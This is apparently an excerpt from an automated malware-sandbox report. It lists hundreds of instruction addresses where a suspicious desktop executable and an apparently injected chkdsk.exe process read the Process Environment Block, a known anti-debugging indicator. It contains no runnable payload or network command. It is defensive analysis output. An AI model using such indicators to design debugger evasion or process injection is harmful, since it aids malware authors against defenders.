          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0130927A mov eax, dword ptr fs:[00000030h]3_2_0130927A
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0137B260 mov eax, dword ptr fs:[00000030h]3_2_0137B260
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0137B260 mov eax, dword ptr fs:[00000030h]3_2_0137B260
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01398A62 mov eax, dword ptr fs:[00000030h]3_2_01398A62
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012EAE73 mov eax, dword ptr fs:[00000030h]3_2_012EAE73
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012EAE73 mov eax, dword ptr fs:[00000030h]3_2_012EAE73
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012EAE73 mov eax, dword ptr fs:[00000030h]3_2_012EAE73
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012EAE73 mov eax, dword ptr fs:[00000030h]3_2_012EAE73
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012EAE73 mov eax, dword ptr fs:[00000030h]3_2_012EAE73
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01354257 mov eax, dword ptr fs:[00000030h]3_2_01354257
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012C9240 mov eax, dword ptr fs:[00000030h]3_2_012C9240
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012C9240 mov eax, dword ptr fs:[00000030h]3_2_012C9240
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012C9240 mov eax, dword ptr fs:[00000030h]3_2_012C9240
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012C9240 mov eax, dword ptr fs:[00000030h]3_2_012C9240
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012D7E41 mov eax, dword ptr fs:[00000030h]3_2_012D7E41
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012D7E41 mov eax, dword ptr fs:[00000030h]3_2_012D7E41
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012D7E41 mov eax, dword ptr fs:[00000030h]3_2_012D7E41
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012D7E41 mov eax, dword ptr fs:[00000030h]3_2_012D7E41
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012D7E41 mov eax, dword ptr fs:[00000030h]3_2_012D7E41
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012D7E41 mov eax, dword ptr fs:[00000030h]3_2_012D7E41
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0138EA55 mov eax, dword ptr fs:[00000030h]3_2_0138EA55
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0138AE44 mov eax, dword ptr fs:[00000030h]3_2_0138AE44
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0138AE44 mov eax, dword ptr fs:[00000030h]3_2_0138AE44
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012C52A5 mov eax, dword ptr fs:[00000030h]3_2_012C52A5
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012C52A5 mov eax, dword ptr fs:[00000030h]3_2_012C52A5
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012C52A5 mov eax, dword ptr fs:[00000030h]3_2_012C52A5
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012C52A5 mov eax, dword ptr fs:[00000030h]3_2_012C52A5
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012C52A5 mov eax, dword ptr fs:[00000030h]3_2_012C52A5
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_013446A7 mov eax, dword ptr fs:[00000030h]3_2_013446A7
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01390EA5 mov eax, dword ptr fs:[00000030h]3_2_01390EA5
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01390EA5 mov eax, dword ptr fs:[00000030h]3_2_01390EA5
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01390EA5 mov eax, dword ptr fs:[00000030h]3_2_01390EA5
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012DAAB0 mov eax, dword ptr fs:[00000030h]3_2_012DAAB0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012DAAB0 mov eax, dword ptr fs:[00000030h]3_2_012DAAB0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012FFAB0 mov eax, dword ptr fs:[00000030h]3_2_012FFAB0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0135FE87 mov eax, dword ptr fs:[00000030h]3_2_0135FE87
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012FD294 mov eax, dword ptr fs:[00000030h]3_2_012FD294
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012FD294 mov eax, dword ptr fs:[00000030h]3_2_012FD294
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F2AE4 mov eax, dword ptr fs:[00000030h]3_2_012F2AE4
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F16E0 mov ecx, dword ptr fs:[00000030h]3_2_012F16E0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012D76E2 mov eax, dword ptr fs:[00000030h]3_2_012D76E2
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F36CC mov eax, dword ptr fs:[00000030h]3_2_012F36CC
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_012F2ACB mov eax, dword ptr fs:[00000030h]3_2_012F2ACB
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01398ED6 mov eax, dword ptr fs:[00000030h]3_2_01398ED6
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_0137FEC0 mov eax, dword ptr fs:[00000030h]3_2_0137FEC0
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 3_2_01308EC7 mov eax, dword ptr fs:[00000030h]3_2_01308EC7
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05353D34 mov eax, dword ptr fs:[00000030h]11_2_05353D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05353D34 mov eax, dword ptr fs:[00000030h]11_2_05353D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05353D34 mov eax, dword ptr fs:[00000030h]11_2_05353D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05353D34 mov eax, dword ptr fs:[00000030h]11_2_05353D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05353D34 mov eax, dword ptr fs:[00000030h]11_2_05353D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05353D34 mov eax, dword ptr fs:[00000030h]11_2_05353D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05353D34 mov eax, dword ptr fs:[00000030h]11_2_05353D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05353D34 mov eax, dword ptr fs:[00000030h]11_2_05353D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05353D34 mov eax, dword ptr fs:[00000030h]11_2_05353D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05353D34 mov eax, dword ptr fs:[00000030h]11_2_05353D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05353D34 mov eax, dword ptr fs:[00000030h]11_2_05353D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05353D34 mov eax, dword ptr fs:[00000030h]11_2_05353D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05353D34 mov eax, dword ptr fs:[00000030h]11_2_05353D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0534AD30 mov eax, dword ptr fs:[00000030h]11_2_0534AD30
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053CA537 mov eax, dword ptr fs:[00000030h]11_2_053CA537
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05374D3B mov eax, dword ptr fs:[00000030h]11_2_05374D3B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05374D3B mov eax, dword ptr fs:[00000030h]11_2_05374D3B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05374D3B mov eax, dword ptr fs:[00000030h]11_2_05374D3B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0537513A mov eax, dword ptr fs:[00000030h]11_2_0537513A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0537513A mov eax, dword ptr fs:[00000030h]11_2_0537513A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05364120 mov eax, dword ptr fs:[00000030h]11_2_05364120
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05364120 mov eax, dword ptr fs:[00000030h]11_2_05364120
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05364120 mov eax, dword ptr fs:[00000030h]11_2_05364120
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05364120 mov eax, dword ptr fs:[00000030h]11_2_05364120
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05364120 mov ecx, dword ptr fs:[00000030h]11_2_05364120
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05349100 mov eax, dword ptr fs:[00000030h]11_2_05349100
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05349100 mov eax, dword ptr fs:[00000030h]11_2_05349100
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05349100 mov eax, dword ptr fs:[00000030h]11_2_05349100
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0536C577 mov eax, dword ptr fs:[00000030h]11_2_0536C577
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0536C577 mov eax, dword ptr fs:[00000030h]11_2_0536C577
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0534B171 mov eax, dword ptr fs:[00000030h]11_2_0534B171
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0534B171 mov eax, dword ptr fs:[00000030h]11_2_0534B171
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0534C962 mov eax, dword ptr fs:[00000030h]11_2_0534C962
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05367D50 mov eax, dword ptr fs:[00000030h]11_2_05367D50
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0536B944 mov eax, dword ptr fs:[00000030h]11_2_0536B944
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0536B944 mov eax, dword ptr fs:[00000030h]11_2_0536B944
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05418D34 mov eax, dword ptr fs:[00000030h]11_2_05418D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05383D43 mov eax, dword ptr fs:[00000030h]11_2_05383D43
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C3540 mov eax, dword ptr fs:[00000030h]11_2_053C3540
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05371DB5 mov eax, dword ptr fs:[00000030h]11_2_05371DB5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05371DB5 mov eax, dword ptr fs:[00000030h]11_2_05371DB5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05371DB5 mov eax, dword ptr fs:[00000030h]11_2_05371DB5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C51BE mov eax, dword ptr fs:[00000030h]11_2_053C51BE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C51BE mov eax, dword ptr fs:[00000030h]11_2_053C51BE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C51BE mov eax, dword ptr fs:[00000030h]11_2_053C51BE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C51BE mov eax, dword ptr fs:[00000030h]11_2_053C51BE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053735A1 mov eax, dword ptr fs:[00000030h]11_2_053735A1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053761A0 mov eax, dword ptr fs:[00000030h]11_2_053761A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053761A0 mov eax, dword ptr fs:[00000030h]11_2_053761A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C69A6 mov eax, dword ptr fs:[00000030h]11_2_053C69A6
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05372990 mov eax, dword ptr fs:[00000030h]11_2_05372990
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0537FD9B mov eax, dword ptr fs:[00000030h]11_2_0537FD9B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0537FD9B mov eax, dword ptr fs:[00000030h]11_2_0537FD9B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0537A185 mov eax, dword ptr fs:[00000030h]11_2_0537A185
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0536C182 mov eax, dword ptr fs:[00000030h]11_2_0536C182
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05372581 mov eax, dword ptr fs:[00000030h]11_2_05372581
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05372581 mov eax, dword ptr fs:[00000030h]11_2_05372581
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05372581 mov eax, dword ptr fs:[00000030h]11_2_05372581
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05372581 mov eax, dword ptr fs:[00000030h]11_2_05372581
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05342D8A mov eax, dword ptr fs:[00000030h]11_2_05342D8A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05342D8A mov eax, dword ptr fs:[00000030h]11_2_05342D8A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05342D8A mov eax, dword ptr fs:[00000030h]11_2_05342D8A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05342D8A mov eax, dword ptr fs:[00000030h]11_2_05342D8A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05342D8A mov eax, dword ptr fs:[00000030h]11_2_05342D8A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053F8DF1 mov eax, dword ptr fs:[00000030h]11_2_053F8DF1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0534B1E1 mov eax, dword ptr fs:[00000030h]11_2_0534B1E1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0534B1E1 mov eax, dword ptr fs:[00000030h]11_2_0534B1E1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0534B1E1 mov eax, dword ptr fs:[00000030h]11_2_0534B1E1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053D41E8 mov eax, dword ptr fs:[00000030h]11_2_053D41E8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0535D5E0 mov eax, dword ptr fs:[00000030h]11_2_0535D5E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0535D5E0 mov eax, dword ptr fs:[00000030h]11_2_0535D5E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_054105AC mov eax, dword ptr fs:[00000030h]11_2_054105AC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_054105AC mov eax, dword ptr fs:[00000030h]11_2_054105AC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C6DC9 mov eax, dword ptr fs:[00000030h]11_2_053C6DC9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C6DC9 mov eax, dword ptr fs:[00000030h]11_2_053C6DC9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C6DC9 mov eax, dword ptr fs:[00000030h]11_2_053C6DC9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C6DC9 mov ecx, dword ptr fs:[00000030h]11_2_053C6DC9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C6DC9 mov eax, dword ptr fs:[00000030h]11_2_053C6DC9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C6DC9 mov eax, dword ptr fs:[00000030h]11_2_053C6DC9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0537002D mov eax, dword ptr fs:[00000030h]11_2_0537002D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0537002D mov eax, dword ptr fs:[00000030h]11_2_0537002D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0537002D mov eax, dword ptr fs:[00000030h]11_2_0537002D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0537002D mov eax, dword ptr fs:[00000030h]11_2_0537002D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0537002D mov eax, dword ptr fs:[00000030h]11_2_0537002D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0537BC2C mov eax, dword ptr fs:[00000030h]11_2_0537BC2C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0535B02A mov eax, dword ptr fs:[00000030h]11_2_0535B02A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0535B02A mov eax, dword ptr fs:[00000030h]11_2_0535B02A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0535B02A mov eax, dword ptr fs:[00000030h]11_2_0535B02A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0535B02A mov eax, dword ptr fs:[00000030h]11_2_0535B02A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C7016 mov eax, dword ptr fs:[00000030h]11_2_053C7016
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C7016 mov eax, dword ptr fs:[00000030h]11_2_053C7016
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C7016 mov eax, dword ptr fs:[00000030h]11_2_053C7016
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05402073 mov eax, dword ptr fs:[00000030h]11_2_05402073
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05411074 mov eax, dword ptr fs:[00000030h]11_2_05411074
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C6C0A mov eax, dword ptr fs:[00000030h]11_2_053C6C0A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C6C0A mov eax, dword ptr fs:[00000030h]11_2_053C6C0A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C6C0A mov eax, dword ptr fs:[00000030h]11_2_053C6C0A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C6C0A mov eax, dword ptr fs:[00000030h]11_2_053C6C0A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05401C06 mov eax, dword ptr fs:[00000030h]11_2_05401C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05401C06 mov eax, dword ptr fs:[00000030h]11_2_05401C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05401C06 mov eax, dword ptr fs:[00000030h]11_2_05401C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05401C06 mov eax, dword ptr fs:[00000030h]11_2_05401C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05401C06 mov eax, dword ptr fs:[00000030h]11_2_05401C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05401C06 mov eax, dword ptr fs:[00000030h]11_2_05401C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05401C06 mov eax, dword ptr fs:[00000030h]11_2_05401C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05401C06 mov eax, dword ptr fs:[00000030h]11_2_05401C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05401C06 mov eax, dword ptr fs:[00000030h]11_2_05401C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05401C06 mov eax, dword ptr fs:[00000030h]11_2_05401C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05401C06 mov eax, dword ptr fs:[00000030h]11_2_05401C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05401C06 mov eax, dword ptr fs:[00000030h]11_2_05401C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05401C06 mov eax, dword ptr fs:[00000030h]11_2_05401C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05401C06 mov eax, dword ptr fs:[00000030h]11_2_05401C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0541740D mov eax, dword ptr fs:[00000030h]11_2_0541740D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0541740D mov eax, dword ptr fs:[00000030h]11_2_0541740D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0541740D mov eax, dword ptr fs:[00000030h]11_2_0541740D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05414015 mov eax, dword ptr fs:[00000030h]11_2_05414015
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05414015 mov eax, dword ptr fs:[00000030h]11_2_05414015
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0536746D mov eax, dword ptr fs:[00000030h]11_2_0536746D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05360050 mov eax, dword ptr fs:[00000030h]11_2_05360050
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05360050 mov eax, dword ptr fs:[00000030h]11_2_05360050
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053DC450 mov eax, dword ptr fs:[00000030h]11_2_053DC450
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053DC450 mov eax, dword ptr fs:[00000030h]11_2_053DC450
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0537A44B mov eax, dword ptr fs:[00000030h]11_2_0537A44B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0537F0BF mov ecx, dword ptr fs:[00000030h]11_2_0537F0BF
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0537F0BF mov eax, dword ptr fs:[00000030h]11_2_0537F0BF
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0537F0BF mov eax, dword ptr fs:[00000030h]11_2_0537F0BF
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05418CD6 mov eax, dword ptr fs:[00000030h]11_2_05418CD6
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053890AF mov eax, dword ptr fs:[00000030h]11_2_053890AF
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053720A0 mov eax, dword ptr fs:[00000030h]11_2_053720A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053720A0 mov eax, dword ptr fs:[00000030h]11_2_053720A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053720A0 mov eax, dword ptr fs:[00000030h]11_2_053720A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053720A0 mov eax, dword ptr fs:[00000030h]11_2_053720A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053720A0 mov eax, dword ptr fs:[00000030h]11_2_053720A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053720A0 mov eax, dword ptr fs:[00000030h]11_2_053720A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0535849B mov eax, dword ptr fs:[00000030h]11_2_0535849B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05349080 mov eax, dword ptr fs:[00000030h]11_2_05349080
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C3884 mov eax, dword ptr fs:[00000030h]11_2_053C3884
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C3884 mov eax, dword ptr fs:[00000030h]11_2_053C3884
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_054014FB mov eax, dword ptr fs:[00000030h]11_2_054014FB
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C6CF0 mov eax, dword ptr fs:[00000030h]11_2_053C6CF0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C6CF0 mov eax, dword ptr fs:[00000030h]11_2_053C6CF0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053C6CF0 mov eax, dword ptr fs:[00000030h]11_2_053C6CF0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053458EC mov eax, dword ptr fs:[00000030h]11_2_053458EC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053DB8D0 mov eax, dword ptr fs:[00000030h]11_2_053DB8D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053DB8D0 mov ecx, dword ptr fs:[00000030h]11_2_053DB8D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053DB8D0 mov eax, dword ptr fs:[00000030h]11_2_053DB8D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053DB8D0 mov eax, dword ptr fs:[00000030h]11_2_053DB8D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053DB8D0 mov eax, dword ptr fs:[00000030h]11_2_053DB8D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053DB8D0 mov eax, dword ptr fs:[00000030h]11_2_053DB8D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0537E730 mov eax, dword ptr fs:[00000030h]11_2_0537E730
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05418B58 mov eax, dword ptr fs:[00000030h]11_2_05418B58
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05344F2E mov eax, dword ptr fs:[00000030h]11_2_05344F2E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05344F2E mov eax, dword ptr fs:[00000030h]11_2_05344F2E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0536F716 mov eax, dword ptr fs:[00000030h]11_2_0536F716
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05418F6A mov eax, dword ptr fs:[00000030h]11_2_05418F6A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053DFF10 mov eax, dword ptr fs:[00000030h]11_2_053DFF10
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_053DFF10 mov eax, dword ptr fs:[00000030h]11_2_053DFF10
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0537A70E mov eax, dword ptr fs:[00000030h]11_2_0537A70E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0537A70E mov eax, dword ptr fs:[00000030h]11_2_0537A70E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0541070D mov eax, dword ptr fs:[00000030h]11_2_0541070D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0541070D mov eax, dword ptr fs:[00000030h]11_2_0541070D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05373B7A mov eax, dword ptr fs:[00000030h]11_2_05373B7A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_05373B7A mov eax, dword ptr fs:[00000030h]11_2_05373B7A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0534DB60 mov ecx, dword ptr fs:[00000030h]11_2_0534DB60
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0535FF60 mov eax, dword ptr fs:[00000030h]11_2_0535FF60
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0540131B mov eax, dword ptr fs:[00000030h]11_2_0540131B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0534F358 mov eax, dword ptr fs:[00000030h]11_2_0534F358
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0534DB40 mov eax, dword ptr fs:[00000030h]11_2_0534DB40
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0535EF40 mov eax, dword ptr fs:[00000030h]11_2_0535EF40
